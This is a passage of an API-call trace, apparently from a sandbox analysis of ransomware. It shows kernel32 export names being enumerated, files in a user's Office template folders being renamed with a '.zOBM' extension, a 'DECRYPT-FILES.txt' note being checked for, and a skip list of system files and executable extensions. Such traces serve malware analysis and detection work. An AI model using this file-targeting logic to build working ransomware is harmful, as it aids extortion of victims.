returned="CreateToolhelp32Snapshot" [0077.777] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.777] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.777] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.777] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.777] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.777] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.778] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.778] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.778] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.778] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.778] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.778] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.778] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.778] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.778] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.778] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.778] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.778] lstrlenA (lpString="DELETEATOM") returned 10 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.779] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.779] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.779] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.779] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.779] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.779] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.779] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.779] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.779] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.779] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.779] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.779] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.779] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.779] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.779] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.779] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.779] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.779] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.780] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.780] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.780] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.780] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.780] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.780] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.780] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.780] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.780] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.780] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.780] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.780] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.780] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.780] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.780] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.780] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.780] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.780] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.780] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.781] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.781] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.781] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.781] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.781] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 118 [0077.781] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.zOBM") returned 123 [0077.781] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.zOBM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.zobm"), dwFlags=0x0) returned 1 [0077.782] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.782] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.782] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.782] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa647960, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.782] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.782] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.783] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.783] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.783] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.783] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.783] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.783] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0077.783] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.783] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0077.783] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\jkbimi8.tmp" [0077.783] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.783] CloseHandle (hObject=0x0) returned 0 [0077.783] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.784] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.784] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0077.784] CloseHandle (hObject=0x458) returned 1 [0077.784] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.784] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.784] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.784] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.784] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.784] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.784] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.784] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.784] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0077.785] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.785] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0077.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\jkbimi8.tmp" [0077.785] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.785] CloseHandle (hObject=0x0) returned 0 [0077.785] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.785] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.785] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.785] CloseHandle (hObject=0x450) returned 1 [0077.786] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.786] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.786] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.786] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.786] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.786] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.786] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.786] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.786] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.786] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0077.786] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.786] lstrcpyW (in: 